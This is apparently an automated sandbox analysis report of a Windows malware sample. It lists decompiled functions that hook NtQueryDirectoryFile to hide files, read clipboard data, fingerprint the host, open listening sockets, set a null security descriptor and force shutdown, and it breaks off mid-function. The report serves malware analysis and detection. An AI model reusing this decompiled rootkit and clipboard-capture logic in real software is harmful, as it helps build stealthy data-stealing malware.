    Uniqueness Score: -1.00%

    Function 0040528A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130nativefilestringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040528A(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
				char _v524;
				WCHAR* _v1544;
				void _v1548;
				void* __edi;
				void* __esi;
				long _t45;
				signed int _t51;
				void* _t53;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				union _FILE_INFORMATION_CLASS _t68;
				void* _t69;
				intOrPtr _t71;
				char* _t74;
				signed int* _t76;
				void* _t78;
				WCHAR* _t79;
				signed int* _t80;

				_t68 = _a32;
				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
				_a40 = _t45;
				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) {
					L31:
					return _a40;
				} else {
					_a36 = _a36 & 0x00000000;
					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) {
						goto L31;
					}
					_t79 =  *0x4126e8; // 0x0
					_v1544[_v1548 & 0x0000ffff] = 0;
					_t89 = _t79;
					if(_t79 != 0) {
						L11:
						_t51 = lstrcmpiW(_t79, _v1544);
						if(_t51 != 0) {
							goto L31;
						}
						_a44 = _a44 & _t51;
						_a4 = _a4 & _t51;
						_t53 = _t68 - 1;
						if(_t53 == 0) {
							_a44 = 0x40;
							L20:
							_a4 = 0x3c;
							L21:
							_t69 = 0;
							_t80 = 0;
							do {
								_t76 = _t80;
								_t80 = _t69 + _a24;
								if(E0040523F(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
									goto L26;
								}
								_t60 =  *_t80;
								if(_t60 == 0) {
									__eflags = _t76;
									if(_t76 == 0) {
										_a40 = 0xc000000f;
									} else {
										 *_t76 =  *_t76 & 0x00000000;
									}
									goto L31;
								}
								if(_t76 != 0) {
									 *_t76 =  *_t76 + _t60;
								}
								L26:
								_t59 =  *_t80;
								_t69 = _t69 + _t59;
							} while (_t59 > 0);
							goto L31;
						}
						_t61 = _t53 - 1;
						if(_t61 == 0) {
							_a44 = 0x44;
							goto L20;
						}
						_t62 = _t61 - 1;
						if(_t62 == 0) {
							_a44 = 0x5e;
							goto L20;
						} else {
							if(_t62 == 9) {
								_a44 = 0xc;
								_a4 = 8;
							}
							goto L21;
						}
					} else {
						E00409697( &_v524, _t89);
						_t79 = E0040D0A7( &_v524);
						 *0x4126e8 = _t79;
						_t74 = 0x41249d;
						_t78 = 2;
						do {
							_t24 = _t74 - 1; // 0x30000
							_t71 =  *0x412a64; // 0x246f5a8
							 *_t74 = E0040D3D8( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
							_t74 = _t74 + 2;
							_t78 = _t78 - 1;
						} while (_t78 != 0);
						if(_t79 == 0) {
							goto L31;
						}
						goto L11;
					}
				}
			}























    0x00405294
    0x004052b8
    0x004052be
    0x004052c3
    0x00405413
    0x0040541a
    0x004052ea
    0x004052ea
    0x0040530b
    0x00000000
    0x00000000
    0x00405318
    0x00405326
    0x0040532a
    0x0040532c
    0x00405371
    0x00405378
    0x00405380
    0x00000000
    0x00000000
    0x00405386
    0x00405389
    0x0040538e
    0x0040538f
    0x004053be
    0x004053c5
    0x004053c5
    0x004053cc
    0x004053cc
    0x004053ce
    0x004053d0
    0x004053d3
    0x004053d5
    0x004053eb
    0x00000000
    0x00000000
    0x004053ed
    0x004053f1
    0x00405403
    0x00405405
    0x0040540c
    0x00405407
    0x00405407
    0x00405407
    0x00000000
    0x00405405
    0x004053f5
    0x004053f7
    0x004053f7
    0x004053f9
    0x004053f9
    0x004053fb
    0x004053fd
    0x00000000
    0x00405401
    0x00405391
    0x00405392
    0x004053b5
    0x00000000
    0x004053b5
    0x00405394
    0x00405395
    0x004053ac
    0x00000000
    0x00405397
    0x0040539a
    0x0040539c
    0x004053a3
    0x004053a3
    0x00000000
    0x0040539a
    0x0040532e
    0x00405334
    0x00405340
    0x00405344
    0x0040534a
    0x0040534f
    0x00405350
    0x00405350
    0x00405354
    0x00405362
    0x00405365
    0x00405366
    0x00405366
    0x0040536b
    0x00000000
    0x00000000
    0x00000000
    0x0040536b
    0x0040532c

    APIs
    • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004052B8
    • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 00405303
    • lstrcmpiW.KERNEL32(00000000,?), ref: 00405378
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Query$DirectoryFileObjectlstrcmpi
    • String ID: <$@
    • API String ID: 2113822959-1426351568
    • Opcode ID: 5a56cb46a03c38787faa9b8a41401de7603bfcd24a3e453a318ebadfe371b95c
    • Instruction ID: 4e05d1c34119942bfa075ed3e9a392ad4945c819893fb0faa8728f68ae96352a
    • Opcode Fuzzy Hash: 5a56cb46a03c38787faa9b8a41401de7603bfcd24a3e453a318ebadfe371b95c
    • Instruction Fuzzy Hash: DE41AD32510A199BCF219F18C844BEB7BA5FF48385F14413AFD04A6290D7B9DCA1CF88
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004106B9, Relevance: 6.2, APIs: 4, Instructions: 171COMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E004106B9(signed int* __esi, signed int _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v72;
				signed short _v74;
				signed short _v76;
				signed short _v78;
				signed short _v80;
				signed char _v86;
				signed int _v88;
				signed short _v90;
				signed short _v92;
				char _v288;
				struct _OSVERSIONINFOW _v368;
				short _v600;
				void* __ebx;
				void* __edi;
				signed int _t64;
				intOrPtr _t102;
				signed int _t109;
				signed int _t111;
				intOrPtr _t122;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				signed int* _t130;
				void* _t131;

				_t130 = __esi;
				_t111 = 1;
				_v9 = 0;
				if( *__esi == 0) {
					_t109 = E0040FD0D();
					 *__esi = _t109;
					if(_t109 == 0) {
						return 0;
					}
					_v9 = 1;
				}
				__eflags = _a4 & 0x00000001;
				if((_a4 & 0x00000001) == 0) {
					L9:
					__eflags = _a4 & 0x00000002;
					if((_a4 & 0x00000002) != 0) {
						_push( &_v16);
						_t128 = 4;
						_v16 = 0x1020500;
						_t111 = E0040FD28(_t130, 0x2713, _t118, _t128);
					}
					goto L11;
				} else {
					_t122 =  *0x412c14; // 0x0
					_t129 =  &_v288;
					E0040D35B(_t122,  &_v288);
					_t102 =  *0x412a8c; // 0x416000
					_t7 = _t102 + 8; // 0x0
					_v80 =  *_t7 & 0x000000ff;
					_t9 = _t102 + 9; // 0x80000000
					_v78 =  *_t9 & 0x000000ff;
					_t11 = _t102 + 0xa; // 0xee800000
					_t118 =  *_t11 & 0x000000ff;
					_v76 =  *_t11 & 0x000000ff;
					_t13 = _t102 + 0xb; // 0x36ee8000
					_v74 =  *_t13 & 0x000000ff;
					_v72 = 0;
					_t111 = E0040FD94( *_t11 & 0x000000ff, __eflags, _t130, 0x2711, _t129);
					__eflags = _t111;
					if(_t111 == 0) {
						L11:
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) == 0) {
							L16:
							__eflags = _t111;
							if(_t111 == 0) {
								L25:
								__eflags = _v9 - 1;
								if(_v9 == 1) {
									E0040CF40( *_t130);
									 *_t130 =  *_t130 & 0x00000000;
									__eflags =  *_t130;
								}
								L27:
								return _t111;
							}
							__eflags = _a4 & 0x00000008;
							if((_a4 & 0x00000008) == 0) {
								L20:
								__eflags = _t111;
								if(_t111 == 0) {
									goto L25;
								}
								__eflags = _a4 & 0x00000010;
								if((_a4 & 0x00000010) != 0) {
									_t64 = GetModuleFileNameW(0,  &_v600, 0x103);
									__eflags = _t64;
									if(_t64 > 0) {
										__eflags = 0;
										 *((short*)(_t131 + _t64 * 2 - 0x254)) = 0;
										_t111 = E0040FD94(0, 0, _t130, 0x271e,  &_v600);
									}
								}
								__eflags = _t111;
								if(_t111 != 0) {
									goto L27;
								} else {
									goto L25;
								}
							}
							_v368.dwOSVersionInfoSize = 0x11c;
							GetVersionExW( &_v368);
							_v36 = _v368.dwMajorVersion;
							_v32 = _v368.dwMinorVersion;
							_v28 = _v368.dwBuildNumber;
							_t121 = _v88 & 0x0000ffff;
							_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
							_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
							_push( &_v36);
							_t125 = 0x14;
							_t111 = E0040FD28(_t130, 0x271c, _v88 & 0x0000ffff, _t125);
							__eflags = _t111;
							if(_t111 == 0) {
								goto L25;
							}
							_v16 =  *0x412c98() & 0x0000ffff;
							_push( &_v16);
							_t126 = 2;
							_t111 = E0040FD28(_t130, 0x271d, _t121, _t126);
							goto L20;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							goto L25;
						}
						_v16 = E0040D015();
						_push( &_v16);
						_t127 = 4;
						_t111 = E0040FD28(_t130, 0x2719, _t118, _t127);
						__eflags = _t111;
						if(_t111 == 0) {
							goto L25;
						}
						_v16 = E0040D054();
						_t111 = E0040FD28(_t130, 0x271b, _t118, _t127,  &_v16);
						__eflags = _t111;
						if(_t111 == 0) {
							goto L25;
						}
						_v16 = GetTickCount();
						_t111 = E0040FD28(_t130, 0x271a, _t118, _t127,  &_v16);
						goto L16;
					}
					__eflags = _v80;
					if(__eflags != 0) {
						_t111 = E0040FD94(_t118, __eflags, _t130, 0x2712,  &_v80);
					}
					__eflags = _t111;
					if(_t111 == 0) {
						goto L11;
					} else {
						goto L9;
					}
				}
			}



































    0x004106b9
    0x004106c7
    0x004106c9
    0x004106cd
    0x004106cf
    0x004106d4
    0x004106d8
    0x00000000
    0x004106da
    0x004106e1
    0x004106e1
    0x004106e5
    0x004106e9
    0x0041075b
    0x0041075b
    0x0041075f
    0x00410764
    0x00410767
    0x0041076f
    0x0041077b
    0x0041077b
    0x00000000
    0x004106eb
    0x004106eb
    0x004106f1
    0x004106f7
    0x004106fc
    0x00410701
    0x00410706
    0x0041070a
    0x0041070f
    0x00410713
    0x00410713
    0x00410718
    0x0041071c
    0x00410721
    0x00410727
    0x00410739
    0x0041073b
    0x0041073d
    0x0041077d
    0x0041077d
    0x00410781
    0x004107ed
    0x004107ed
    0x004107ef
    0x004108cf
    0x004108cf
    0x004108d3
    0x004108d7
    0x004108dc
    0x004108dc
    0x004108dc
    0x004108df
    0x00000000
    0x004108df
    0x004107f5
    0x004107f9
    0x0041088b
    0x0041088b
    0x0041088d
    0x00000000
    0x00000000
    0x0041088f
    0x00410893
    0x004108a3
    0x004108a9
    0x004108ab
    0x004108ad
    0x004108af
    0x004108c9
    0x004108c9
    0x004108ab
    0x004108cb
    0x004108cd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004108cd
    0x00410806
    0x00410810
    0x00410820
    0x00410829
    0x00410832
    0x0041083e
    0x00410842
    0x0041084e
    0x00410854
    0x00410857
    0x00410864
    0x00410866
    0x00410868
    0x00000000
    0x00000000
    0x00410873
    0x00410879
    0x0041087c
    0x00410889
    0x00000000
    0x00410889
    0x00410783
    0x00410785
    0x00000000
    0x00000000
    0x00410790
    0x00410796
    0x00410799
    0x004107a6
    0x004107a8
    0x004107aa
    0x00000000
    0x00000000
    0x004107b5
    0x004107c8
    0x004107ca
    0x004107cc
    0x00000000
    0x00000000
    0x004107d8
    0x004107eb
    0x00000000
    0x004107eb
    0x0041073f
    0x00410744
    0x00410755
    0x00410755
    0x00410757
    0x00410759
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00410759

    APIs
    • GetTickCount.KERNEL32 ref: 004107D2
    • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00410810
      • Part of subcall function 0040FD0D: RtlAllocateHeap.NTDLL(00000008,00000020,004106D4), ref: 0040FD17
    • GetUserDefaultUILanguage.KERNEL32(?), ref: 0041086A
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 004108A3
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateCountDefaultFileHeapLanguageModuleNameTickUserVersion
    • String ID:
    • API String ID: 1370906912-0
    • Opcode ID: e690b42c18d2051999dadb943c6944ec9968085eea55aced679ea0a99ccf83c8
    • Instruction ID: 52f9b919dec9d73a3f59e216f5e9ac745801094c2c90bd2694daddd936959e40
    • Opcode Fuzzy Hash: e690b42c18d2051999dadb943c6944ec9968085eea55aced679ea0a99ccf83c8
    • Instruction Fuzzy Hash: 4851E930A442485AEB21EBA9D8457EEB7F49F06304F044077E954EB3C2E7BC49C9DB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409697, Relevance: 6.0, APIs: 4, Instructions: 45filestringnativeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00409697(WCHAR* __esi, void* __eflags) {
				long _v8;
				WCHAR* _v1028;
				void _v1032;
				void* _t22;

				E0040966F(__esi);
				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
				 *__esi = 0;
				if(_t22 != 0xffffffff) {
					_v8 = _v8 & 0;
					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
						_v1028[_v1032 & 0x0000ffff] = 0;
						lstrcpyW(__esi, _v1028);
					}
					return CloseHandle(_t22);
				}
				return 0;
			}







    0x004096a3
    0x004096c1
    0x004096c5
    0x004096cb
    0x004096cd
    0x004096eb
    0x0040970a
    0x00409715
    0x00409715
    0x00000000
    0x0040971c
    0x00409724

    APIs
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 004096BB
    • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 004096E3
    • lstrcpyW.KERNEL32(?,?), ref: 00409715
    • CloseHandle.KERNEL32(00000000), ref: 0040971C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
    • String ID:
    • API String ID: 2309192175-0
    • Opcode ID: ef567f120559eeee839739635092bc5c78c81f6937ee7a319871cb0ab8fb6410
    • Instruction ID: a8c9d0e6cebc92cd4f7de5843069dc9e07bb58abc6f28cd539da5ad874471621
    • Opcode Fuzzy Hash: ef567f120559eeee839739635092bc5c78c81f6937ee7a319871cb0ab8fb6410
    • Instruction Fuzzy Hash: 2E01DFB5610214A7E7209B68DD85FAE72BCAF04704F1040A2F702F71C2E6B49E42875C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E2D4, Relevance: 6.0, APIs: 4, Instructions: 26networkCOMMON
    Download Yara Rule
    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 0040E2DD
    • bind.WS2_32(00000000,?,?), ref: 0040E2F0
    • listen.WS2_32(00000000,?), ref: 0040E2FF
    • closesocket.WS2_32(00000000), ref: 0040E30A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: d7d57c81ff8a1331083f54aa5fdaf1d6b9f57fb77cbe649db8982e9c858aa1f6
    • Instruction ID: e24d26c31cae34de6a0dc3903049515c462e2ee4bf8347298c21b24f275761da
    • Opcode Fuzzy Hash: d7d57c81ff8a1331083f54aa5fdaf1d6b9f57fb77cbe649db8982e9c858aa1f6
    • Instruction Fuzzy Hash: DAE092312051206AC6302F659D0CBDB7F68AF81761F018A35FCA1E21E0E37989B187A8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004105E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004105E8() {
				void* _t1;

				E0040CFFE(_t1, 0x413468, 0, 0x24);
				if(InitializeSecurityDescriptor(0x413474, 1) != 0 && SetSecurityDescriptorDacl(0x413474, 1, 0, 0) != 0) {
					 *0x413470 =  *0x413470 & 0x00000000;
					 *0x413468 = 0xc;
					 *0x41346c = 0x413474;
				}
				return 1;
			}




    0x004105f2
    0x00410607
    0x0041061a
    0x00410621
    0x0041062b
    0x0041062b
    0x00410634

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00413474,00000001,00413468,00000000,00000024,00000000,004094E0), ref: 004105FF
    • SetSecurityDescriptorDacl.ADVAPI32(00413474,00000001,00000000,00000000), ref: 00410610
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$DaclInitialize
    • String ID: t4A
    • API String ID: 625223987-373857135
    • Opcode ID: c4eb8456df5244ea749b30731b495073214d48dfe4cfd0f9aeebd7bbdfbad2df
    • Instruction ID: 0d6d73681dfe4e5e6bf51d08da96368d80da41ca7683be907a434f6208d5bc0f
    • Opcode Fuzzy Hash: c4eb8456df5244ea749b30731b495073214d48dfe4cfd0f9aeebd7bbdfbad2df
    • Instruction Fuzzy Hash: 5EE04FB0780310B6F6211F156D4ABC62A689B40B56F108026F204BD1D0C7F959D2CAAD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040554F, Relevance: 4.6, APIs: 3, Instructions: 77clipboardCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0040554F(void* __ebp, signed int _a4) {
				intOrPtr _v0;
				void* _v4;
				void* _v8;
				void* __ecx;
				void* __edi;
				void* _t9;
				intOrPtr _t12;
				void* _t23;
				void* _t25;
				void* _t28;
				int _t39;
				void* _t42;
				void* _t43;

				_t42 = __ebp;
				_t39 = _a4;
				_t9 = GetClipboardData(_t39);
				_t28 = _t9;
				_v4 = _t28;
				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
					GlobalFix(_t28);
					_t23 = _t9;
					if(_t23 != 0) {
						_a4 = _a4 & 0x00000000;
						if(_t39 == 0xd) {
							_push(_t42);
							_t26 = _t23;
							_t43 = E0040D3D8(_t23);
							_t12 = E0040D312(_t11, _t23);
							_v0 = _t12;
							if(_t12 != 0) {
								_t40 = " ";
								E00405452(_t26, 1, " ");
								if(_t43 != 0) {
									E00405452(_t26, _t43, _a4);
								}
								E00405452(_t26, 1, _t40);
							}
						} else {
							_t41 = " ";
							E00405452(_t25, 1, " ");
							_t27 = _t23;
							if(E0040D3C6(_t23) != 0) {
								E00405452(_t27, _t19, _t23);
							}
							E00405452(_t27, 1, _t41);
						}
						E0040CF40(_a4);
						_t28 = _v8;
						GlobalUnWire(_t28);
					}
				}
				return _t28;
			}
















    0x0040554f
    0x00405551
    0x00405557
    0x0040555d
    0x0040555f
    0x00405565
    0x00405580
    0x00405586
    0x0040558a
    0x00405590
    0x00405598
    0x004055c6
    0x004055c7
    0x004055cf
    0x004055d1
    0x004055d6
    0x004055dc
    0x004055de
    0x004055e7
    0x004055ee
    0x004055f6
    0x004055f6
    0x004055ff
    0x004055ff
    0x0040559a
    0x0040559a
    0x004055a3
    0x004055a8
    0x004055b1
    0x004055b6
    0x004055b6
    0x004055bf
    0x004055bf
    0x00405609
    0x0040560e
    0x00405613
    0x00405613
    0x00405619
    0x0040561f

    APIs
    • GetClipboardData.USER32(?), ref: 00405557
    • GlobalFix.KERNEL32(00000000), ref: 00405580
    • GlobalUnWire.KERNEL32(?), ref: 00405613
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Global$ClipboardDataWire
    • String ID:
    • API String ID: 2697403597-0
    • Opcode ID: 388f884643870b20ef470cda4c4fc4c9952330a5442c0fe51d89c96eb75d6053
    • Instruction ID: 77db71e0d4a6e2849990123e69e3f3a5b4e07345e905206ac57c60471fb0275b
    • Opcode Fuzzy Hash: 388f884643870b20ef470cda4c4fc4c9952330a5442c0fe51d89c96eb75d6053
    • Instruction Fuzzy Hash: D0110A7690871167C711367A4C4597F6599DFC1315B05443FF84DB3292CE7CCC4289AE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E457, Relevance: 4.5, APIs: 3, Instructions: 21networkCOMMON
    Download Yara Rule
    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 0040E460
    • bind.WS2_32(00000000,?,?), ref: 0040E473
    • closesocket.WS2_32(00000000), ref: 0040E47E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: bca6853dcb6051550eaaa58a8f629a6457586d29896c97e52dd6463b623a6cde
    • Instruction ID: d2d8bdefd19766b18480b8988ee799641ea943befb136c72367d8b96d28a5859
    • Opcode Fuzzy Hash: bca6853dcb6051550eaaa58a8f629a6457586d29896c97e52dd6463b623a6cde
    • Instruction Fuzzy Hash: B5E08C3120516066C2202FA95D0CEEBAA68AB05771F10CB32FDA0E21E0D3748CA286A8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A16B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13shutdownCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040A16B() {
				intOrPtr _v0;

				E0040F0FC(L"SeShutdownPrivilege");
				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
			}




    0x0040a170
    0x0040a190

    APIs
      • Part of subcall function 0040F0FC: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040961C,SeDebugPrivilege), ref: 0040F111
      • Part of subcall function 0040F0FC: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 0040F131
      • Part of subcall function 0040F0FC: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0040F147
      • Part of subcall function 0040F0FC: GetLastError.KERNEL32 ref: 0040F151
      • Part of subcall function 0040F0FC: FindCloseChangeNotification.KERNELBASE(?), ref: 0040F160
    • ExitWindowsEx.USER32(00000001,00000000), ref: 0040A185
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
    • String ID: SeShutdownPrivilege
    • API String ID: 1103692467-3733053543
    • Opcode ID: c0b849bad9631b9bd26cba802f70e6b01ca5c5d992566862274416b5fe327dcf
    • Instruction ID: 832338d5d24ef919c078582c1ce4f177575fe7a2c8eb67e3512c5ef70086f2ee
    • Opcode Fuzzy Hash: c0b849bad9631b9bd26cba802f70e6b01ca5c5d992566862274416b5fe327dcf
    • Instruction Fuzzy Hash: EEC08C90796341BAF2103AB20F0BB4F68884B60B94F18CC3AB042E24D2C87CC664B638
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00412014, Relevance: 2.9, Strings: 2, Instructions: 373COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: 0@$?Q@
    • API String ID: 0-944785670
    • Opcode ID: f7be5a50371d56287a4359eb081eb66690dd23ddbf7abc00c7367f92b3049a4e
    • Instruction ID: d0c4063beb1af011b0062ee165e80add20f31a715f3029080c28b2cedc6f16b3
    • Opcode Fuzzy Hash: f7be5a50371d56287a4359eb081eb66690dd23ddbf7abc00c7367f92b3049a4e
    • Instruction Fuzzy Hash: 0AD1CE6048E3C24FD71387B449699917FB0AE1312871E96EFC5D6CF4A3D29D889BC722
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405171, Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00405171(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t15;
				intOrPtr _t16;
				short* _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t16 = _a4;
				_t18 = _t16 -  *0x412a7c; // 0x70950000
				if(_t18 == 0) {
					L2:
					if(_t17 == 0) {
						L4:
						_t13 = 0;
						L5:
						if(_t17 == 0) {
							L8:
							_t9 = 0;
							L9:
							_t10 = E00406B6A(_t13, _t15, _t16, _t9, _a12, _t13);
							if(_t10 == 0) {
								return  *0x412b1c(_t16, _t17, _a12, _a16);
							}
							 *_a16 = _t10;
							return 0;
						}
						_t9 =  *((intOrPtr*)(_t17 + 4));
						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
							goto L8;
						} else {
							goto L9;
						}
					}
					_t13 =  *((intOrPtr*)(_t17 + 4));
					goto L5;
				}
				_t19 = _t16 -  *0x412bb0; // 0x75300000
				if(_t19 != 0) {
					goto L4;
				}
				goto L2;
			}










    0x00405175
    0x00405179
    0x0040517c
    0x00405182
    0x0040518c
    0x0040518e
    0x00405195
    0x00405195
    0x00405197
    0x00405199
    0x004051a8
    0x004051a8
    0x004051aa
    0x004051b0
    0x004051b7
    0x00000000
    0x004051ca
    0x004051bc
    0x00000000
    0x004051be
    0x0040519b
    0x004051a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004051a0
    0x00405190
    0x00000000
    0x00405190
    0x00405184
    0x0040518a
    0x00000000
    0x00000000
    0x00000000

    APIs
    • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 004051CA
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProcedure
    • String ID:
    • API String ID: 3653107232-0
    • Opcode ID: 762b6ef818220d900234958e823f73775c6e842ec288e74e3dc43633983134db
    • Instruction ID: 359417492a32612044e996936296b7745bacbc4c16446bc33c143b5d67a09c24
    • Opcode Fuzzy Hash: 762b6ef818220d900234958e823f73775c6e842ec288e74e3dc43633983134db
    • Instruction Fuzzy Hash: 97016232A00515ABDB228F55DD00ABB776AEF85750B05443AFC01FB280D778BC109FA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040D054, Relevance: 1.5, APIs: 1, Instructions: 21timeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040D054() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}








    0x0040d055
    0x0040d063
    0x0040d06c
    0x0040d076
    0x0040d085
    0x0040d078
    0x0040d078
    0x00000000
    0x0040d078
    0x0040d06e
    0x0040d06e
    0x0040d07b
    0x0040d080
    0x0040d080
    0x0040d08b

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 0040D063
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 504c8aa912d926c400be450e2d8436faffa15de0af32c9c8faebafa35f6b28b4
    • Instruction ID: da2e8eef0cf4ffaab41400f214a53638155768fa17a909a3a52e1985826177b8
    • Opcode Fuzzy Hash: 504c8aa912d926c400be450e2d8436faffa15de0af32c9c8faebafa35f6b28b4
    • Instruction Fuzzy Hash: CBE08630E44008CBDB24DFE4DE4599E77FAA705308F300536E946F62C0E678D94BCA46
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DFED, Relevance: .2, Instructions: 190COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 98%
    			E0040DFED(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
